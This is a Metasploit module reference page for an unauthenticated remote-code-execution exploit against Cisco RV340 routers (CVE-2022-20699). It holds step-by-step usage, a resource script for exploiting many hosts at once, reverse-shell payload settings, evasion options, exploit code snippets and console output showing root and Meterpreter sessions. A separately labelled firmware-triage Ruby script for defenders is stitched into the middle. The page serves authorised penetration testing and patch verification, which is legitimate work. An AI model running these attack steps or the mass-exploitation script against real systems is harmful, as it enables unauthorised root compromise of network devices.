Cisco RV340 SSL VPN Unauthenticated Remote Code Execution - Metasploit
This page contains detailed information about how to use the exploit/linux/misc/cisco_rv340_sslvpn Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
Module: exploit/linux/misc/cisco_rv340_sslvpn
Source code: modules/exploits/linux/misc/cisco_rv340_sslvpn.rb
Disclosure date: 2022-02-02
Last modification time: 2022-06-10 14:01:57 +0000
Supported architecture(s): armle
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-20699
This module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022. For more information check the referenced advisory. This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it. Only the RV340 router was tested, but other RV series routers should work out of the box.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-restarts: Module may crash the service, but the service restarts.
Basic Usage
Using cisco_rv340_sslvpn against a single host
Normally, you can use exploit/linux/misc/cisco_rv340_sslvpn this way:
msf > use exploit/linux/misc/cisco_rv340_sslvpn
msf exploit(cisco_rv340_sslvpn) > show targets
... a list of targets ...
msf exploit(cisco_rv340_sslvpn) > set TARGET target-id
msf exploit(cisco_rv340_sslvpn) > show options
... show and set options ...
msf exploit(cisco_rv340_sslvpn) > exploit
Using cisco_rv340_sslvpn against multiple hosts
Because this is a remote exploit module, it can also be run against multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your cisco_rv340_sslvpn will be using:
- Do: use exploit/multi/handler
- Do: set PAYLOAD [payload]
- Set other options required by the payload
- Do: set EXITONSESSION false
- Do: run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/misc/cisco_rv340_sslvpn")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")
  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")
  run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Description
This module exploits a stack buffer overflow (CVE-2022-20699) in the Cisco RV series routers SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet as seen in this video!
The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022.
This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it.
Only the RV340 router was tested, but other RV series routers should work out of the box.
For more information, check the advisories listed under References.
Vulnerable Application
Cisco RV340 Router, firmware versions 1.0.03.24 and below. The bug is fixed in 1.0.03.26 and above.
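The version bounds above can be applied directly to an asset inventory. The following Ruby is an added example, not code from the Metasploit module or the original page; the CSV layout, host names and status labels are assumptions made for illustration. Models other than the RV340 are reported separately because the page gives version bounds only for that model, and 1.0.03.25 is reported as unconfirmed because the page does not mention it.

```ruby
# Added example (not from the Metasploit module): triage an inventory against
# the firmware versions this page gives for CVE-2022-20699.
LAST_VULNERABLE = [1, 0, 3, 24].freeze # page: "1.0.03.24 and below"
FIRST_FIXED     = [1, 0, 3, 26].freeze # page: "fixed in 1.0.03.26 and above"
TESTED_MODEL    = 'RV340'              # the only model the page says was tested

# Constructed sample inventory; the column layout is an assumption.
SAMPLE_INVENTORY = <<~CSV
  host,model,firmware,sslvpn
  edge-01,RV340,1.0.03.24,on
  edge-02,RV340,1.0.03.26,on
  edge-03,RV340,1.0.03.15,off
  edge-04,RV340,1.0.03.25,on
  edge-05,RV345,1.0.03.22,on
  edge-06,rv340,v1.0.3,on
CSV

# "1.0.03.24" -> [1, 0, 3, 24]. Returns nil unless the string is exactly four
# dot-separated decimal fields, so a malformed entry is never read as patched.
def parse_firmware(text)
  m = /\A(\d+)\.(\d+)\.(\d+)\.(\d+)\z/.match(text.to_s.strip)
  m && m.captures.map(&:to_i)
end

# Status labels (hypothetical names), most urgent first.
PRIORITY = %i[exposed vulnerable_sslvpn_off unconfirmed unparsed other_model fixed].freeze

# Status for one device.
def classify(model, firmware, sslvpn)
  # The page's version bounds are stated for the RV340 only.
  return :other_model unless model.to_s.strip.casecmp?(TESTED_MODEL)

  version = parse_firmware(firmware)
  return :unparsed if version.nil?
  return :fixed if (version <=> FIRST_FIXED) >= 0
  # Versions between the two bounds (1.0.03.25) are not covered by the page.
  return :unconfirmed if (version <=> LAST_VULNERABLE) > 0

  # Vulnerable firmware: still needs the upgrade even with the SSL VPN service
  # off, but a device with the service on is the one to fix first.
  sslvpn.to_s.strip.downcase == 'on' ? :exposed : :vulnerable_sslvpn_off
end

# Parse the CSV text and return [host, status] pairs sorted by urgency, then host.
def triage(csv_text)
  rows = csv_text.lines.map(&:strip).reject(&:empty?).drop(1) # drop header row
  pairs = rows.map do |line|
    host, model, firmware, sslvpn = line.split(',', 4)
    [host, classify(model, firmware, sslvpn)]
  end
  pairs.sort_by { |host, status| [PRIORITY.index(status), host] }
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_INVENTORY).each { |host, status| puts format('%-8s %s', host, status) }
end
```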
Verification Steps
- Connect to the target on the WAN interface (or provide IP address)
- Make sure the SSLVPN service is turned on for the correct WAN interface
- Start msfconsole
- Do: use exploits/linux/misc/cisco_rv340_sslvpn.rb
- Set RHOST, RPORT, LHOST and LPORT
- Do: check
- Do: run
- You should get a shell.
Options
Module options (exploit/linux/misc/cisco_rv340_sslvpn):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    8443             yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host
Payload options (linux/armle/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The shell to execute.
Exploit target:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Scenarios
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > check
[*] 5.55.55.62:8443 - The service is running, but could not be validated.
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > exploit
[*] Started reverse TCP handler on 5.55.55.1:4445
[*] 5.55.55.62:8443 - 5.55.55.62:8443 - Pwning Cisco RV340 Firmware Version <= 1.0.03.24
[*] Command shell session 30 opened (5.55.55.1:4445 -> 5.55.55.62:41976 ) at 2022-02-10 20:12:18 +0000
id
uid=0(root) gid=0(root)
uname -a
Linux router138486 4.1.8 #2 SMP Fri Oct 22 09:50:26 IST 2021 armv7l GNU/Linux
Msfconsole Usage
Here is how the linux/misc/cisco_rv340_sslvpn exploit module looks in the msfconsole:
msf6 > use exploit/linux/misc/cisco_rv340_sslvpn
[*] Using configured payload linux/armle/shell_reverse_tcp
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show info
Name: Cisco RV340 SSL VPN Unauthenticated Remote Code Execution
Module: exploit/linux/misc/cisco_rv340_sslvpn
Platform: Linux
Arch: armle
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2022-02-02
Provided by:
Pedro Ribeiro <[email protected]>
Radek Domanski <[email protected]>
Module stability:
crash-service-restarts
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Check supported:
Yes
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    8443             yes       The target port (TCP)
  SSL      true             yes       Use SSL
  VHOST                     no        HTTP server virtual host
Payload information:
Description:
This module exploits a stack buffer overflow in the Cisco RV series
routers SSL VPN functionality. The default SSL VPN configuration is
exploitable, with no authentication required and works over the
Internet! The stack is executable and no ASLR is in place, which
makes exploitation easier. Successful execution of this module
results in a reverse root shell. A custom payload is used as
Metasploit does not have ARMLE null free shellcode. This
vulnerability was presented by the Flashback Team in Pwn2Own Austin
2021 and OffensiveCon 2022. For more information check the
referenced advisory. This module has been tested in firmware
versions 1.0.03.15 and above and works with around 65% reliability.
The service restarts automatically so you can keep trying until you
pwn it. Only the RV340 router was tested, but other RV series
routers should work out of the box.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-20699
https://www.youtube.com/watch?v=O1uK_b1Tmts
https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md
https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md
https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html
Module Options
This is a complete list of options available in the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show options
Module options (exploit/linux/misc/cisco_rv340_sslvpn):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    8443             yes       The target port (TCP)
   SSL      true             yes       Use SSL
   VHOST                     no        HTTP server virtual host
Payload options (linux/armle/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/sh          yes       The shell to execute.
Exploit target:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Advanced Options
Here is a complete list of advanced options supported by the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show advanced
Module advanced options (exploit/linux/misc/cisco_rv340_sslvpn):
   Name                     Current Setting  Required  Description
   ----                     ---------------  --------  -----------
   AutoCheck                true             no        Run check before exploit
   CHOST                                     no        The local client address
   CPORT                                     no        The local client port
   ConnectTimeout           10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                    no        The information file that contains context information
   DOMAIN                   WORKSTATION      yes       The domain to use for Windows authentication
   DigestAuthIIS            true             no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler    false            no        Disable the handler code for the selected payload
   EnableContextEncoding    false            no        Use transient context when encoding payloads
   FingerprintCheck         true             no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false            no        Override check result
   HttpClientTimeout                         no        HTTP connection and receive timeout
   HttpPassword                              no        The HTTP password to specify for authentication
   HttpRawHeaders                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false            no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu          no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false            no        Show HTTP headers only in HttpTrace
   HttpUsername                              no        The HTTP username to specify for authentication
   SSLCipher                                 no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLServerNameIndication                   no        SSL/TLS Server Name Indication (SNI)
   SSLVerifyMode            PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion               Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent                Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1  no        The User-Agent header to use for all requests
   VERBOSE                  false            no        Enable detailed status messages
   WORKSPACE                                 no        Specify the workspace for this module
   WfsDelay                 2                no        Additional delay in seconds to wait for a session
Payload advanced options (linux/armle/shell_reverse_tcp):
   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AppendExit                  false            no        Append a stub that executes the exit(0) system call
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PrependChrootBreak          false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                 false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid            false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid            false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid             false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the linux/misc/cisco_rv340_sslvpn module can exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show targets
Exploit targets:
Id Name
-- ----
0 Cisco RV340 Firmware Version <= 1.0.03.24
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/cisco_rv340_sslvpn exploit:
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show payloads
Compatible Payloads
===================
   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                                    normal  No     Interact with Established SSH Connection
   4   payload/linux/armle/exec                                        normal  No     Linux Execute Command
   5   payload/linux/armle/meterpreter/bind_tcp                        normal  No     Linux Meterpreter, Bind TCP Stager
   6   payload/linux/armle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   7   payload/linux/armle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   8   payload/linux/armle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   9   payload/linux/armle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   10  payload/linux/armle/shell/bind_tcp                              normal  No     Linux dup2 Command Shell, Bind TCP Stager
   11  payload/linux/armle/shell/reverse_tcp                           normal  No     Linux dup2 Command Shell, Reverse TCP Stager
   12  payload/linux/armle/shell_bind_tcp                              normal  No     Linux Command Shell, Reverse TCP Inline
   13  payload/linux/armle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the linux/misc/cisco_rv340_sslvpn exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(linux/misc/cisco_rv340_sslvpn) > show evasion
Module evasion options:
   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maxiumum tcp segment size. (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed to connect to the chosen application
Here is a relevant code snippet related to the "Failed to connect to the chosen application" error message:
  )
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
  sock.close if sock
end
if sock.nil?
  fail_with(Failure::Unknown, 'Failed to connect to the chosen application')
end

# also need to add support for old ciphers
ctx = OpenSSL::SSL::SSLContext.new
ctx.min_version = OpenSSL::SSL::SSL3_VERSION
<PEER> - Failed to connect to the router
Here is a relevant code snippet related to the "<PEER> - Failed to connect to the router" error message:
      #
      # It would be good to add some valid headers with semi random data for proper evasion :D
      http = 'POST /' + rand_text_alphanumeric(0x86) + " HTTP/1.1\r\nContent-Length: 16404\r\n\r\n"

      sock.write(http)
      sock.write(payload)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
    end
  end
end
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
- CVE-2022-20699
- https://www.youtube.com/watch?v=O1uK_b1Tmts
- https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md
- https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html
See Also
Check also the following modules related to this module:
- exploit/linux/http/cisco_asax_sfr_rce
- exploit/linux/http/cisco_firepower_useradd
- exploit/linux/http/cisco_hyperflex_file_upload_rce
- exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec
- exploit/linux/http/cisco_prime_inf_rce
- exploit/linux/http/cisco_rv32x_rce
- exploit/linux/http/cisco_rv_series_authbypass_and_rce
- exploit/linux/http/cisco_ucs_cloupia_script_rce
- exploit/linux/http/cisco_ucs_rce
- exploit/linux/ssh/cisco_ucs_scpuser
- exploit/multi/http/cisco_dcnm_upload
- exploit/multi/http/cisco_dcnm_upload_2019
- exploit/windows/browser/cisco_anyconnect_exec
- exploit/windows/browser/cisco_playerpt_setsource
- exploit/windows/browser/cisco_playerpt_setsource_surl
- exploit/windows/browser/cisco_webex_ext
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/dos/cisco/ios_http_percentpercent
- auxiliary/dos/cisco/ios_telnet_rocem
- auxiliary/spoof/cisco/cdp
- auxiliary/spoof/cisco/dtp
- exploit/linux/http/cve_2019_1663_cisco_rmi_rce
- exploit/windows/browser/juniper_sslvpn_ive_setupdll
Authors
- Pedro Ribeiro <[email protected]>
- Radek Domanski <radek.domanski[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.